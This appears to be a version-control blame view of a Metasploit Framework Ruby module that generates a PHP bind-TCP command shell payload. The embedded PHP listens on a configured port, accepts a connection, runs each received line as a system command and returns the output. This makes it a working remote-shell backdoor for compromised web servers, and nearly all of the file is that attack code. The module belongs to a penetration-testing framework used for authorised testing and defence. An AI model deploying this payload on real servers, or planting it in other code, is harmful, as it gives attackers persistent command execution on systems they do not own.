2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-10-05 19:23:45 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/projects/Framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core'
|
2008-07-01 01:44:56 +00:00
|
|
|
require 'msf/core/payload/php'
|
2006-12-18 22:06:19 +00:00
|
|
|
require 'msf/core/handler/bind_tcp'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
module Payloads
|
|
|
|
module Singles
|
|
|
|
module Php
|
|
|
|
|
|
|
|
module BindPhp
|
|
|
|
|
|
|
|
include Msf::Payload::Single
|
2008-07-01 01:44:56 +00:00
|
|
|
include Msf::Payload::Php
|
2006-12-18 22:06:19 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'PHP Command Shell, Bind TCP (via php)',
|
2007-02-18 00:10:39 +00:00
|
|
|
'Version' => '$Revision$',
|
2007-10-05 21:10:37 +00:00
|
|
|
'Description' => 'Listen for a connection and spawn a command shell via php (persistent)',
|
2008-07-01 01:44:56 +00:00
|
|
|
'Author' => ['egypt', 'diaul <diaul@devilopers.org>',],
|
2006-12-18 22:06:19 +00:00
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Handler' => Msf::Handler::BindTcp,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# PHP Bind Shell
|
|
|
|
#
|
|
|
|
def php_bind_shell
|
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4);
|
|
|
|
shell = <<-END_OF_PHP_CODE
|
|
|
|
#{php_preamble({:disabled_varname => dis})}
|
|
|
|
$port=#{datastore['LPORT']};
|
|
|
|
|
|
|
|
$scl='socket_create_listen';
|
|
|
|
if(is_callable($scl)&&!in_array($scl,#{dis})){
|
|
|
|
$sock=$scl($port);
|
|
|
|
}else{
|
|
|
|
$sock=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
|
|
|
|
$ret=socket_bind($sock,0,$port);
|
|
|
|
$ret=socket_listen($sock,5);
|
|
|
|
}
|
|
|
|
$msgsock=socket_accept($sock);
|
|
|
|
socket_close($sock);
|
2006-12-18 22:06:19 +00:00
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
while(FALSE!==socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL))
|
2006-12-18 22:06:19 +00:00
|
|
|
{
|
2008-07-01 01:44:56 +00:00
|
|
|
|
|
|
|
$c=socket_read($msgsock,2048,PHP_NORMAL_READ);
|
|
|
|
if(FALSE===$c){break;}
|
|
|
|
#{php_system_block({:cmd_varname=>"$c", :output_varname=>"$o", :disabled_varname => dis})}
|
|
|
|
socket_write($msgsock,$o,strlen($o));
|
|
|
|
}
|
|
|
|
socket_close($msgsock);
|
2006-12-18 22:06:19 +00:00
|
|
|
END_OF_PHP_CODE
|
|
|
|
|
|
|
|
return shell
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + php_bind_shell
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end end end end
|